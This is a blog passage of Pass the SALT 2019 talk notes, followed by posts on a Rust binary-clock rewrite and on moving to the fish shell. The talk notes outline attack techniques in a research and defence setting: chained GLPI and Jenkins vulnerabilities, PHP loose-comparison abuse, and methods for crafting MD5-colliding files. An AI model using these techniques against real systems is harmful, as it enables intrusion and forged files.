PatrOwl is an open source platform to automate security scans, for use in SecOps teams. It has pluggable connectors for data sources, with many already provided by default.

According to Nicolas, there's a growing set of challenges in cybersecurity. Automation and orchestration can help address them, but only if you do it properly, and at better scale than attackers. That's why PatrOwl was built. It integrates the best-of-breed scan tools to analyze a network.

Written in Python 3, it integrates multiple engines, by domain; these are applications or web services, like nmap or VirusTotal, that are used in various use cases. PatrOwl is currently looking for contributors and user feedback.

That's it for Pass the SALT 2019. Thanks to the team for organizing this event !

Pass the SALT 2019 live report (part 2/3)

2019-07-02T00:00:00+02:00

This year I'm at the Pass the Salt 2019 conferences. You'll find part 1 of my notes and part 2 here.

Time-efficient assessment of open-source projects for Red Teamers

by Thomas Chauchefoin and Julien Szlamowicz (slides)

In their pentest team, Julien often does red team assessments with big scopes, often facing a blue team. The talk is a case study on the work they did assessing GLPI, and the methodology they used.

GLPI is a GPLv2 inventory tool often used by sysadmins, widely deployed in France and Brazil, which made it an interesting target.

In Red Team assessments, discretion is key, as opposed to traditional pentests, where noise does not matter as much. Thomas says the forensic footprint should be as low as possible. Therefore, a good Red Team vulnerability should be silent.

An aspect of assessing Open Source Software is that you don't work with a blackbox, and it's easier to replicate an accurate environment in a lab. In this case, the attack surface that was analyzed is only comprised of non-authenticated code paths. PHP apps often have scripts that are directly accessible. They used an internal tool to help find public-facing paths, and also looked at previous GLPI vulnerabilities.

They didn't have semantic tooling, but used various hooks for DB queries, or low-level PHP functions, as well as profilers to do the analysis. They also wrapped $_GET and $_POST objects in order to have automatic analysis of bad usage.

The first issue they found was an infoleak that exposed the versions of GLPI, PHP and the OS. Then, they found an SQL injection, which wasn't immediately usable because the query parameters were sanitized. This sanitization was still bypassable in a few cases, which they were able to do with another injection.

They then looked at the way the "Remember me" feature was implemented with json in a cookie. This allowed controlling the algorithm of password verification, therefore enabling a denial of service on the server. It also used PHP loose comparisons, which allows abusing string compare when a string starts with '0e' (see my writeup of 'La simplicité' in SIGSEGv1 CTF).
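For readers unfamiliar with the '0e' trick, here is a rough emulation in Python of how PHP's loose comparison treats two strings. It is a simplification, not PHP's actual algorithm: the regular expression is only an approximation of what PHP considers a numeric string, and the sample values are made up.

```python
import re

# Simplified notion of a PHP "numeric string": sign, digits, optional exponent.
NUMERIC = re.compile(r"[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?")


def php_loose_equals(a, b):
    """Emulate `$a == $b` for two strings: numeric strings compare as numbers."""
    if NUMERIC.fullmatch(a) and NUMERIC.fullmatch(b):
        return float(a) == float(b)
    return a == b


# Both strings read as "0 times 10 to some power", so both are the number 0.
print(php_loose_equals("0e1234", "0e5678"))   # True
# As soon as one of them isn't numeric, a plain string comparison is done.
print(php_loose_equals("0e1234", "0e12a4"))   # False
```

This is why a hash or token starting with '0e' followed only by digits can be equal to a completely different one when compared with == instead of ===.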

They also found a Local File Inclusion (LFI) issue in a query, which then allowed calling arbitrary functions.

The communication with GLPI maintainers was very smooth, and they were quick to react and apply patches, even if it took some time to arrive in released versions.

Hacking Jenkins!

by Orange Tsai (slides)

Jenkins is the most used CI/CD software in the world. It's a very interesting target, because it has access to source code, might have access to credentials, or compute nodes. It has been exploited in the wild.

The most common attack vector is a dictionary attack on the login page. Then come the previously known vulnerabilities, like deserialization bugs, of which there were many instances because the initial fixes were blacklist-based. The serialization has since been rewritten to replace Java serialization with an HTTP API.

Orange then decided to review core Jenkins code, starting with the router. He found an issue with crafting URLs, that were mapped to class names and methods. But since access paths were whitelisted for non-authenticated users, he had to find a given path through whitelist objects in order to reach a dangerous invocation.

The next step was to find another vulnerability to chain with in order to reach code execution on the server. For this, he looked at Pipeline, a DSL built on top of Groovy that allows writing reproducible Jenkins scripts that can be tracked in a VCS.

Pipeline scripts must have a valid syntax in order to be interpreted: this is simple to do, but the only path he found only did parsing, and no execution. To bypass that, Orange used Groovy meta-programming with the @Grab and @ASTTest annotations that allowed executing code. Finally, he found an issue in the @Grab implementation that allowed injecting a jar file by URL with @GrabResolver.

After the vulnerabilities were reported and fixed, new vulnerabilities were found by other researchers, to have more generic entry points and ease exploitation. Unfortunately, public exploitation of these issues was common, including the infamous hack of the Matrix infrastructure, because many people were slow to update their Jenkins instances.

VLC Security

by Jean-Baptiste Kempf (slides)

VLC is the most popular video player, and its popularity comes from the fact that it can understand most video formats, even incomplete files. Jean-Baptiste estimates that it has more than 450 million users, even though there is no telemetry to have an exact count, because that would be "spying on users".

VLC has about 1 million lines of code, but lots (100+) of dependencies, which brings the total to more than 15 million lines of code, including C, C++ and handcrafted ASM, of varying quality.

VLC development happens on a mailing list, with relatively long review processes. Static and dynamic analysis is done by most developers. Fuzzing has been added recently. Hardening started in 3.0, from PIE code to fixing most warnings of modern compilers, enabling ASLR, DEP, etc.

The release process is very strict, with offline signing and very well defined steps.

Despite Jean-Baptiste's hate for bug bounties, VLC participated in the EU-FOSSAv2 program, with a twist: they decided to add bonuses for researchers that provided fixes. The result of this bug bounty was 31 security issues, with one classified as high. The program was successful in the end.

The best researchers were very good, but the worst were very bad, going as far as insults or death threats. In general, half of the security reports are "total crap", Jean-Baptiste says. There's also a tendency to overblow security issues: from bad CVSS scores to click-baiting articles. The evaluation of the impact is also very bad, since even very hard-to-exploit issues are given up to 9.8 CVSS scores without PoCs. Jean-Baptiste followed with more examples of bad behaviour coming from parts of the infosec community.

A research project inside VLC is to put a sandbox inside VLC to segment the different parts of VLC to have different permissions; hopefully, this should improve the general security, but this is a complex endeavour.

OSS in the quest for GDPR compliance

by Aaron Macsween (slides)

Aaron started by saying he was filling in for Cristina Delisle, the original author of the talk, who couldn't make it.

Privacy and security are often "added at the end" of a project, which doesn't work and has terrible consequences. And there's no single fix to this, since these domains are complicated, and often interdependent. For both, one must evaluate the threat model: what you're protecting, for how long, from whom, etc. In some cases, you need to choose between privacy and security.

An example, Aaron says, is that you might optimize for security by reducing privacy via surveillance: for example what your bank does with financial transactions.

At the other end of the spectrum, you can optimize for privacy with less security, by having web services that have no authentication, like privacy pastebins, or mega's ciphered uploads for example.

Cryptpad, of which Aaron is the lead developer, is a real-time collaboration tool like Etherpad, but with encryption. The browser-based "thick" client does most of the work, with an append-only log data structure on the server. It has many extensions, from read/write/delete features, to file-server capability, etc. It's used by various users in hackerspaces or activist groups; it was funded with a grant from BPI France, the NLNet Foundation, and donations.

GDPR

The European privacy regulation has been in effect since May 2018, and has made Aaron's job much easier by raising awareness on the privacy issues, he says.

The strategy in Cryptpad is one of data minimization, by reducing what's needed at a given moment, like the way Cryptpad does peer-to-peer conflict resolution instead of a server-based one.

The Data Protection Officer (DPO) role (Cristina's) can be adversarial, but always useful: it forces auditable traces around the handled data for example. The data controllers are the DPO's employers, the ones handling the data. And the data processors can be any third parties handling the data, like the hosting or payment processing companies.

Aaron says there are still a few areas of uncertainty, like when a self-hoster becomes a data controller, or how to challenge the "legitimate use" that has a fuzzy definition in the law.

TLS 1.3: Solving new challenges for next generation firewalls

by Nicolas Pamart

Nicolas is presenting joint work with Damien Deville and Thomas Malherbe on how they adapted their firewall and IPS product to work with TLS 1.3.

The Intrusion Prevention System inside the proprietary Stormshield product does TLS analysis: it looks at the data in the Client Hello and Server Hello handshake packets to get the client and server certificates. With TLS 1.3, it's no longer possible to get the Server Certificate just by looking at network traffic.

Since they didn't want to decrypt in order to stay passive, they elected to buffer the ClientHello and replay it once the connection was approved. In order to get the Server certificate, the IPS contacts the destination server with the same SNI and cipher list, but with its own KeyShare. It can then make a decision and replay the original ClientHello so that its connection can be established. A cache was added on top of that to have only one request per domain per time period.
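The cache part is easy to picture with a small sketch. This is not Stormshield's implementation, just a minimal time-based cache in Python keyed by SNI; the class name, the probe callback (standing in for the extra connection to the destination server) and the verdict values are all hypothetical.

```python
import time


class VerdictCache:
    """Remember the decision for a server name for a limited time."""

    def __init__(self, ttl_seconds, clock=time.monotonic):
        self.ttl = ttl_seconds
        self.clock = clock     # injectable so the behaviour can be tested
        self._entries = {}     # sni -> (expiry time, verdict)

    def get_or_probe(self, sni, probe):
        """Return the cached verdict, or call probe(sni) once and cache its result."""
        now = self.clock()
        entry = self._entries.get(sni)
        if entry is not None and entry[0] > now:
            return entry[1]
        verdict = probe(sni)   # e.g. fetch the certificate and evaluate it
        self._entries[sni] = (now + self.ttl, verdict)
        return verdict


cache = VerdictCache(ttl_seconds=300)
print(cache.get_or_probe("example.org", lambda sni: "allow"))
print(cache.get_or_probe("example.org", lambda sni: "never called while cached"))
```

With such a cache, only the first ClientHello for a given domain in each time period pays the cost of the extra handshake.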

In order to handle TLS 1.3 session resumption in the case where SNI isn't provided, there is also an SNI coherence layer, which is a cache of SNI presence.

In a response to a question, Nicolas said that encrypted SNI with DNSSEC might completely break this feature of the IPS.

Lookyloo: A complete solution to investigate complex websites - with a decent UI

by Quinn Norton and Raphaël Vinot (slides)

Lookyloo is a UI to visualize the requests made by complex websites. It allows visualizing exactly which URLs are loaded when contacting a website. It's built on top of Splash and the ETE toolkit.

When looking at a tree, you can see when a request switches to insecure mode, or how many ad toolkits are loaded.

It can be used to detect when websites use a technique to bypass TLS mixed-content warnings, or when there are transparent HTTP meta redirects.

It can help popular sites analyze what resources are pulled by the single ad network code they put on their frontpage. Every time you load a page, it might change, and lookyloo allows looking at the requests, saving them and analyzing them offline.

Quinn and Raphaël showed an example where a very popular website showed a GDPR warning, but still loaded dozens of resources before user consent was given.

Rump sessions

The rumps are five-minute talks on various subjects.

BPFCTRL

by Eloïse Brocas and Eric Leblond

bpfctrl is a new tool to analyze and manipulate eBPF maps loaded in the Linux kernel. Eloïse built it as a wrapper on top of bpftool. It's higher-level and written in a mix of C and Rust. It was missing in Suricata, to debug the traffic that was filtered.

$0.02 DNS Firewall with MISP

by Xavier Mertens (slides)

Xavier recommends using your own resolver and logging all queries, because everything goes through the DNS. With RPZ, it's possible to filter malicious domains by returning fake addresses.

There are plenty of malicious domain sources, but Xavier chose to use MISP, an incident response and sharing platform, to handle this list. A script does the extraction of malicious domains, which is then used by the bind configuration. Xavier posted about his configuration here
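The last step, turning a list of domains into RPZ records, could be sketched like this in Python. It is not Xavier's script: the extraction from MISP is left out, the domain list and the sinkhole address are made up, and the output is only the record lines that would go into a response policy zone file.

```python
def rpz_records(domains, sinkhole_ip="127.0.0.1"):
    """Return RPZ record lines answering a fake address for each domain."""
    cleaned = {d.strip().lower().rstrip(".") for d in domains if d.strip()}
    lines = []
    for domain in sorted(cleaned):
        # Owner names are relative to the policy zone, hence no trailing dot.
        lines.append(f"{domain} A {sinkhole_ip}")
        lines.append(f"*.{domain} A {sinkhole_ip}")   # also cover subdomains
    return lines


# Hypothetical domains, as they could come out of a threat-sharing platform.
for line in rpz_records(["Bad.example.", "evil.test"]):
    print(line)
```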

Gamebuino as a keyboard

by Antoine Cervoise (slides)

Antoine presented how he added keyboard functionality to his Gamebuino, an open console based on Arduino, and used it to run automated commands, with different keyboard layouts supported.

RUDDER

by Alexandre Brianceau (slides)

Rudder is an open-source continuous compliance auditing and configuration platform.

Why fuzz Rust code ?

by Pierre Chifflier (slides)

Are Rust's memory safety and a test suite enough to ensure correctness ? Pierre says no, and every error should be handled properly without crashing. That's why Rust code should be fuzzed. The cargo-fuzz crate can help with that, especially if you combine it with code coverage analysis.

Pierre says fuzzing is necessary, but neither sufficient, nor a starting point. You should also share the fuzzing corpus, because it has a lot of value.

Total recall

by Alexandre Dulaunoy (slides)

CIRCL does a lot of crawling of websites, including on Tor, where they take a lot of screenshots of webpages. They have a lot of data, but need to analyze it. Total recall is a tool to do large-scale image comparison and classification, to find phishing sites that look like popular websites.

A tool named Douglas Quaid has been released, as well as the CIRCL phishing dataset.

Psychological manipulation

by Simon Heilles (slides)

Simon goes over a few ways to manipulate humans. Understanding the different techniques is very useful to protect oneself.

That's it for part 2. Part 3 is continued here.

Pass the SALT 2019 live report (part 1/3)

2019-07-01T00:00:00+02:00

This year I'm at the Pass the Salt 2019 conference. You'll find my notes updated in real time here.

Kill MD5

by Ange Albertini (slides)

Ange starts by saying that he does not know much about crypto, and he had help from Marc Stevens, a hash-collision cryptographer. This talk should provide a high-level overview.

A property of hashes is that you shouldn't be able to guess a hashed content from the hash value. This is still true, even for MD2, Ange says.

Hash collisions fall into two types: identical-prefix and chosen-prefix.

A collision is split into four parts: the prefix, its padding, the collision block, and the suffix. Only the collision block changes between two collided files.
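The four-part layout can be sketched in a few lines. This only illustrates the structure: the "collision blocks" below are plain stand-ins, not real colliding data, and the zero-byte filler is an assumption (a real file would use padding that its format tolerates).

```python
BLOCK_SIZE = 64  # MD5 processes its input in 64-byte blocks


def pad_to_block(prefix: bytes, filler: bytes = b"\x00") -> bytes:
    """Pad the prefix so the collision block starts on a block boundary."""
    missing = -len(prefix) % BLOCK_SIZE
    return prefix + filler * missing


def assemble(prefix: bytes, collision_block: bytes, suffix: bytes) -> bytes:
    """Lay out a file as: prefix, padding, collision block, suffix."""
    return pad_to_block(prefix) + collision_block + suffix


# Stand-in blocks: a real attack tool would compute these.
file_a = assemble(b"header", b"A" * 128, b"common suffix")
file_b = assemble(b"header", b"B" * 128, b"common suffix")
print(len(file_a), len(file_b))
```

Because the hash state is identical after the collision blocks, any identical suffix appended to both files keeps the two hashes equal, which is what makes the suffix part free to choose.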

For a chosen prefix collision, the two prefixes can be completely different. It means the state of the hash function will be different in the two files when computing the collision blocks.

MD5

MD5 is mostly dead since 2008 when a practical attack was demonstrated.

To further prove this point, Ange computed a few demos colliding JPGs, executables, MP4s, GIFs, etc. He even went as far as doing a collision of four different file types for PoC||GTFO: PDF, PNG, PE and MP4.

There are a few different algorithms to exploit MD5 collisions, with varying difficulty.

To craft a file that is collidable, the common approach is to have a comment in the file; in the collision block, the comment will mask a chunk that isn't in the original file. In order to have a file format that isn't collidable, don't put comments in it, or remove comments before computing hashes.

To conclude, Ange said that MD5 isn't a cryptographic hash, but a toy function. Do not use it to compute hashes. His work was meant to prove the real-world feasibility of hash attacks.

Dexcalibur - automate your android app reverse

by Georges-B. Michel (slides)

An obfuscated Android app will usually be split in multiple .dex stages, first a packer, then a loader and then the payload. Only the first stage is usually available for static analysis, the rest is usually done dynamically, and can be very cumbersome.

That's why Georges started developing a toolkit in order to automate this process: Dexcalibur.

Dexcalibur integrates many tools: baksmali for disassembling, as well as file identifiers, parsers, static and dynamic code analyzers, and instrumentation with Frida. He added a modular heuristic search engine on top of that, as well as a web UI.

The current limitations are that it can't hook native code or do symbolic execution of bytecode. To fix that, Georges intends to integrate radare2 in Dexcalibur in the future.

In a demo, Georges showed a crackme running in an emulator, and being analyzed in real-time in the Dexcalibur web UI. It works by extracting all the code present in an APK, then instrumenting it before running it. There are default hooks, for filesystem access for example. The code is then run, and at hook points, the analysis engine will evaluate a few rules in order to provide the most complete view of the reversed app possible.

As an example, if code is called dynamically (reflection), Dexcalibur will still update the cross-references (xref) in order to have a complete call graph.

Reversing a firmware uploader & other NFC stories

by Aurélien Pocheville (slides)

Aurélien started with a warning to always be careful when manipulating LF NFC tags. He once erased one by mistake when attempting to use a brand new proxmark.

The Chameleon Mini: Rev E is an NFC writer tool, that is widely available online. Unfortunately, it only worked with Windows, so Aurélien decided to reverse its loader in order to create a multiplatform free and open source solution. Since it was based on a reversed iceman tool, he thought it was just a case of finding an AES key. When launching the tool, it looked like a simple DFU programmer, but he didn't know that at the time.

In order to reverse the firmware builder, he started with Ghidra, a relatively recent RE and decompiling toolkit. Very quickly by looking at the code, he found an AES key, and attempted to decrypt the code with it. It wasn't successful. Afterwards, he looked again at the data preprocessing, and after two attempts, found both that the data was run through a rolling XOR, and that the key was used in decryption mode for encryption (and vice-versa).

Looking at the flasher, he found that the AES layer was decrypted (in encryption mode), but the rolling XOR was kept. The on-device bootloader undid the rolling XOR.
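For readers unfamiliar with the term, here is a sketch of one common rolling XOR variant, where each byte is XORed with the previous output byte. The talk did not detail the exact chaining or seed used by the Chameleon tooling, so both are assumptions here, and the AES layer is left out entirely.

```python
def rolling_xor_encode(data: bytes, seed: int = 0) -> bytes:
    """XOR each byte with the previous *encoded* byte (assumed variant)."""
    out = bytearray()
    prev = seed
    for byte in data:
        prev = byte ^ prev  # chain on the byte we just produced
        out.append(prev)
    return bytes(out)


def rolling_xor_decode(data: bytes, seed: int = 0) -> bytes:
    """Undo rolling_xor_encode: XOR each byte with the previous encoded byte."""
    out = bytearray()
    prev = seed
    for byte in data:
        out.append(byte ^ prev)
        prev = byte
    return bytes(out)


firmware = b"example firmware bytes"
assert rolling_xor_decode(rolling_xor_encode(firmware)) == firmware
```

Splitting the scheme this way matches the description above: one side (the flasher) can strip the AES layer while leaving the rolling XOR for another component (the bootloader) to undo.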

In the end, he had a working solution, but it can still be improved.

He then presented a small puzzle with NFC tags controlling access to an apartment complex, which he cloned for a friend, but then ran into an anti-clone protection that triggered erratic behaviour.

Improving your firmware security analysis process with FACT

by Johannes vom Dorp (slides)

IoT devices are growing in number, and more and more of them are used as part of network attacks. FACT is a tool to help with firmware analysis in order to improve security.

A typical firmware analysis, Johannes says, starts with unpacking. Then you'll gather information with the help of a tool in order to attempt identifying obvious weaknesses. Then, if there is nothing obvious, one should start doing reverse engineering. The goal of FACT is to automate the first three parts, leaving RE as a manual phase.

The initial goal in 2015 was to improve on binwalk, which mostly does extraction and discovery of files. The goal was to make a new tool with even more automated phases, and being as extendable as possible. FACT is still using binwalk for a lot of use cases, but its internal tools have also replaced it for many operations.

In addition to combining unpacking with various tools, FACT does parallel analysis, provides result visualization, a plugin system, and stores its results in a query-able database, which can be used for comparison or statistical analysis. Many statistics are already provided by default.

In a demonstration of the tool, Johannes showed how a binary can be found vulnerable to heartbleed in a router firmware, as well as the many generated statistics. In another, he showed the crypto material that was found in the image, in an executable; you can then search for other occurrences of the same key for example. There are also various ways to search across all the firmware images: from a quick search, to an advanced one, to a raw mongodb query; it's also possible to search by yara rules.

The compare feature allows comparing two different versions of the same firmware for example, to find only what changed, or the common software. This can be used for example to find what bug was fixed in a given version. Or, in Johannes' example, to check whether a fix actually fixes the core issue.

cwe_checker: Hunting Binary Code Vulnerabilities Across CPU Architectures

by Thomas Barabosch and Nils-Edvin Enkelmann (slides)

Another tool is presented here, to automate a part of the vulnerability research tasks, with an accent on supporting multiple CPU architectures. In order to do that, cwe_checker works with an intermediate representation (IR), generated by BAP, an open source reverse engineering tool.

Nils says cwe_checker is inspired by clang-analyzer: it finds potential bugs by applying heuristics of varying complexity. It has a modular structure, and is written in OCaml, like BAP which it builds atop. CWE stands for Common Weakness Enumeration, and the tool is named like that because each specific heuristic analyzer has a given number, and they check for various issues: integer overflow, null dereference, TOCTOU race, etc.

cwe_checker can do symbolic execution with BAP's Primus engine, although it can be time consuming, especially with path explosion. That's why it's only optional.

cwe_checker uses a variety of techniques; for integer overflow, it currently checks for instructions run before a malloc-family function, but other functions can be added. For NULL dereference, it has a list of functions that can return NULL, and verifies whether the return value is checked for NULL with varied flow analysis in the IR.

FACT, presented in the previous talk, integrates cwe_checker. The project also provides integration with IDA Pro with python scripts.

In conclusion, Thomas says there are still a few false positives and negatives, so they want to improve the checks, but also add more checks and different types of analysis.

Unlocking secrets of the proxmark3 RDV4

by Christian Herrmann

Proxmark3 is the third iteration of a board designed for RFID research. It works at 125kHz, 13.56MHz, as well as contact tags. It's a versatile tool.

Recent high profile uses include an attack on the Tesla model S key fob that could be cloned with a Proxmark3; another one was the VingCard vulnerability, that affected 140 million door locks.

The previous revision had a few issues, so a kickstarter was made to launch a newer, smaller, more powerful version. The new design allows for antenna customisation, which is critical depending on what tag you want to address, has onboard memory, etc.

The new version now supports chip-and-pin cards (ISO-7816), with an extension for snooping on what happens in an exchange and running commands. It also has a bluetooth and battery add-on, allowing it to be used wirelessly with a smartphone (if it had an Android/iOS app).

There's an ARM processor on board, and an FPGA for RF processing. The command line tool has many different commands, as well as high-level lua scripts. It can work in standalone mode, or with a client that does the computation or crypto attacks.

Workshop: Let’s play ColTris - understand and exploit hash collisions

by Ange Albertini (slides)

This workshop is an intro to hash collisions, and how to exploit each one with relation to file formats.

At first we used hashclash to compute md5 collisions with an empty prefix with the md5_fastcoll tool. Then we used a prefix we generated. These are identical prefix collisions.

Fastcoll is easy to run, but hard to use, because you need a file format where you can skip the identical random data in the collided blocks, but also use the modified bytes to make the two files behave differently. For example, if the differing bytes control the length of a comment block, then the comment blocks will have a different length in each of the two files, meaning the files will be interpreted differently.

When you want to craft a reusable collision, you need to plan a header that will contain two files, depending on where the comment blocks are, and this way, with your two headers, you can generate two colliding files at will.
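The comment-length trick is easier to see on a toy format. The sketch below uses a made-up chunk format (one type byte, one length byte, then the payload; `C` chunks are comments, `D` chunks are displayed data), and no real collision is computed: the single differing byte simply plays the role of the byte that a collision would let you change without changing the hash.

```python
def parse(blob: bytes) -> bytes:
    """Return the concatenated data chunks, skipping comment chunks."""
    shown = b""
    pos = 0
    while pos < len(blob):
        kind, length = blob[pos:pos + 1], blob[pos + 1]
        if kind == b"D":
            shown += blob[pos + 2:pos + 2 + length]
        pos += 2 + length  # comments ("C") are skipped entirely
    return shown


def build_pair(content_a: bytes, content_b: bytes, filler: bytes = b"\x00" * 4):
    """Build two files that differ only in the first comment's length byte."""
    chunk_a = b"D" + bytes([len(content_a)]) + content_a
    chunk_b = b"D" + bytes([len(content_b)]) + content_b
    skip_b = b"C" + bytes([len(chunk_b)])  # comment header that hides chunk_b
    body = filler + chunk_a + skip_b + chunk_b
    short = len(filler)  # comment ends right before chunk_a
    long = len(filler) + len(chunk_a) + len(skip_b)  # ends right before chunk_b
    return b"C" + bytes([short]) + body, b"C" + bytes([long]) + body


file_1, file_2 = build_pair(b"cat", b"dog")
print(parse(file_1), parse(file_2))
```

With the short comment, the parser sees the first content and then a comment that swallows the second; with the long comment, it jumps straight over the first content and lands on the second.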

Next, we started using unicoll, with the poc_no.sh script in the hashclash tool set. This attack changes very little in the collision blocks: there is no padding, and only two bytes are modified, by being incremented. It takes longer to compute (a few minutes instead of seconds), but since the modified bytes are only incremented, it gives more control when creating collisions with some file formats.

Using unicoll, it's possible to exploit the PNG file structure, by varying the byte size of a block in big endian: this gives you a jump of +0x100, more than enough to have varying data in the skipped chunk.
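The +0x100 jump follows directly from how PNG stores chunk lengths: a 4-byte big-endian integer placed before the chunk type. A quick sketch, where the chunk type `skIp` and the length 0x75 are arbitrary values picked for illustration:

```python
import struct


def chunk_header(length: int, chunk_type: bytes) -> bytes:
    """PNG chunk header: 4-byte big-endian length, then the 4-byte type."""
    return struct.pack(">I", length) + chunk_type


header = bytearray(chunk_header(0x75, b"skIp"))
bumped = bytearray(header)
bumped[2] += 1  # increment the second-lowest byte of the length field

old_len = struct.unpack(">I", bytes(header[:4]))[0]
new_len = struct.unpack(">I", bytes(bumped[:4]))[0]
print(hex(old_len), hex(new_len), hex(new_len - old_len))
```

A single +1 on that byte makes the chunk 256 bytes longer in one of the two files, so a parser skips 256 more bytes of data there.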

Next, Ange showed how to use fastcoll with the GIF format in particular. GIF is quite old, and its sub-block and comment structure allows using fastcoll, which is very useful for computing fast collisions.

In the end, Ange explained the constraints of the chosen-prefix attack, and how to implement it using the hashclash cpc.sh script. The length of the prefixes doesn't matter, but having a file format that tolerates appended data is important. It's this attack that Ange used to generate a reusable PE format collision. If block alignment is properly handled, it's possible to chain collisions, which can be used for mixing file types, or modifying content in a per-block fashion with unicoll.

That's it for part 1. Part 2 is continued here, and part 3 here.

How I traded my first software project 15 years ago

2019-06-26T00:00:00+02:00

2004

Gmail recently celebrated its 15th anniversary, which led me down the path of remembering how I got my first gmail invite. Back then, the private Gmail beta was all the rage. In the first few months, gmail invites were scarce. I got one by doing the most popular thing at the time: sending a postcard to a stranger. He was nice enough to send it right away, but the postcard took so long to arrive (2 weeks+) that he initially thought I had scammed him :-) That's how I was initially part of that name rush.

To get my second invite, I decided walking to a post office and spending ~2€ was a bit too much effort, so instead of a postcard, I went back to the gmail-invite exchanges and proposed something only I had: a small software project I had been writing in my free time: a binary clock.

I don't remember how I learned about binary clocks, but at the time, various ones existed in watch, alarm clock, or software form. As a student, I decided to put to use my freshly-learned C and SDL skills to rewrite one for my desktop.

I had been using it for a few weeks when I decided to trade this software in a gmail invite marketplace. I sent the windows build to a random stranger for a gmail invite. Fun fact: I remember it not working on the first try because it depended on the standard C runtime DLL (msvcrt.dll) which I didn't ship with it. I didn't know what a runtime or C library was back then, I just knew I had to ship SDL.dll and that it would work. I got my gmail invite and completely forgot about this binary clock after a few months.

Present day

I rediscovered this bit of code in my backups. It survived despite my backup strategy not being as safe as I'd like: there was only one copy for a long time. It's now multi-site and multi-copy, but I wouldn't mind one more of each.

Needless to say, the code was ugly, despite being a very simple project (less than 200 lines of C). But it still built and worked (mostly) as expected. SDL is truly a work of art, and with sdl12-compat, the projects based on it should continue to live on for a long time.

I fixed all the warnings given by modern gcc, passed it through automatic indenting, rewrote the makefiles, changed the newlines to unix ones, and am releasing it today. The stranger who received the windows build had a long enough exclusivity period :-).

Rewriting

As I am learning the Rust programming language with the Rust book, I thought this small project would be a good candidate for a rewrite, since it's simple enough. You can have a look at the code here as well.

There is an sdl2 crate, which allows calling the SDL2 library in safe Rust. The crate doc is good enough, and the crate itself has enough examples to start just by modifying some code. It took me some time to work out the image loading. The examples load pngs, which requires SDL_Image in C, or the "image" feature of the crate in Rust, which means I had to add that. This is clearly documented in the README, which I unfortunately managed to skip. But since I was loading bmps in the original code, it took me a while to realize that the load_bmp method from sdl2::surface::Surface would do the job, from which I could create a Texture for use in a Canvas.

While I expected this after reading so many examples from the Rust book, it's still surprising how much Rust's ownership constraints force you to structure your code in a different way in order to satisfy the safety rules. Luckily, I've found the rustc errors to be (mostly) explanatory, although the suggested solution wasn't always what I needed. Maybe this little program lacks depth, but it seems to me that the Rust team has taken to heart the initial criticisms that rustc errors were hard to grok.

Since this is a clock, I was surprised to find no date/time package in the Rust standard library. But the Rust cookbook recommends using chrono, which looks like the de-facto crate for this job. It looks quite good and is well documented, but it's hard to discover such a crucial missing part when you're doing offline work and can't go search for crates.

The rewrite differs from the original a bit since it uses SDL2 instead of SDL 1.2. It also uses an event pump to build the event loop, instead of a manually built one. Unlike games, this program does not need to update at 60 frames per second, but at best only once per second. The original program had two updates per second as a heuristic not to miss updates. This time I wanted to be a bit more clever with the event loop, and only update on window events (window just reappeared) or every second. Unfortunately, there's no timer event in SDL, so my solution is a bit hackish: the program just checks if the second changed to do the refresh.
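The "redraw only when the second changed" check boils down to very little code. This is a language-neutral sketch in Python, not the Rust code of the project; the function names, the polling interval and the injectable `clock`/`wait` parameters are all illustrative choices.

```python
import time


def needs_redraw(last_drawn_second, now, window_event):
    """Redraw on a window event, or when the wall-clock second has changed."""
    return window_event or int(now) != last_drawn_second


def run(ticks, draw, clock=time.time, wait=time.sleep):
    """Poll `ticks` times, calling draw(now) only when a refresh is needed."""
    last = None
    for _ in range(ticks):
        now = clock()
        if needs_redraw(last, now, window_event=False):
            draw(now)
            last = int(now)
        wait(0.05)  # assumed polling interval, short enough not to skip a second


# Simulated timestamps: only three distinct seconds, so only three redraws.
fake_times = iter([10.0, 10.2, 10.9, 11.0, 11.5, 12.1])
drawn = []
run(6, drawn.append, clock=lambda: next(fake_times), wait=lambda _: None)
print(drawn)
```

The loop still wakes up several times per second, but the expensive part (drawing) only happens once per second or when the window asks for it.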

In the end, the new program seems to consume more CPU resources than the original, but I haven't looked in depth at the cause (rust-c ffi? SDL2 event loop?); this will be an area of improvement for future work.

Update June 14, 2020: I have now fixed the higher CPU usage, and it was due to misunderstanding how events work in SDL2.

Bash : so long, and thanks for all the fish !

2019-03-31T00:00:00+01:00

I recently took the plunge and decided to move to fish, a friendly modern shell.

Background

I'm heavily invested in bash. I wrote countless scripts, for my personal use, and for various jobs or projects, so I didn't think it would be an easy thing to move away from it. But I tried anyway, because if you always stay in your comfort zone, you never learn anything, and stop growing. And I didn't regret it. I've moved to fish (3.0.2 at the time of this writing) on all my machines, including Termux on my mobile phone.

The trigger was probably, in retrospect, the fact that the bash development process makes AOSP feel like a model of open source development, see for example this git commit.

Fish is written in C++ (but it looks mostly like modern C), has a github, CI, pull requests, and more than one contributor. It's 14 years old (vs 30 for bash or 29 for zsh), so it's pretty young compared to other shells. But the project is still very mature.

Differences from bash

One important aspect is that fish is designed around a simpler language, and is not POSIX-compatible. It makes the command lines and the scripts much easier to read. This also means that you shouldn't uninstall bash just yet, it might be useful to run those legacy scripts :-)

Although you can write scripts pretty easily, fish is mostly designed around the command line use. It works very well by default, and requires very little configuration. For example, while there's no full-featured linter like shellcheck (which you should really use with bash), fish has live command-line syntax checking: if it knows it won't be able to run your command because of a syntax error or non-existing command, it will highlight it in red, allowing you to fix it before even running.

A core fish feature is the auto-suggestions: they mostly remove the need to use reverse history search (Ctrl+R); they are enabled by default and take some time to get used to, but make you very productive in the end. You can still search in history by typing part of a previous command, and then pressing UP. This is useful since auto-suggestions only match history (and completions, file paths) from the beginning of a command.

While there's an fzf integration, I didn't really feel the need to use it.

Since the language is different, you cannot simply add environment variables to a command like this: VAR=x cmd, you need to use env to run the command: env VAR=x cmd. It's a bit longer to type. You also need to be careful if you have such commands in your config files, for example I had to change this vim fugitive configuration:

let g:fugitive_git_executable="LANG=C LC_ALL=C git"

into this:

let g:fugitive_git_executable="env LANG=C LC_ALL=C git"

(That's because fugitive parses git output in English.)

This construct is portable to other shells as well, so that's fine.
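The reason it is portable is that env is a regular program, not shell syntax: it sets the variables and then executes the command, so no shell needs to understand the VAR=x prefix. A small sketch that runs it without any shell involved (the helper name is made up, and it assumes a POSIX system with env in the PATH):

```python
import subprocess
import sys


def run_with_env(assignments, command):
    """Run `env VAR=value... command...` directly, without going through a shell."""
    argv = ["env", *assignments, *command]
    result = subprocess.run(argv, capture_output=True, text=True, check=True)
    return result.stdout


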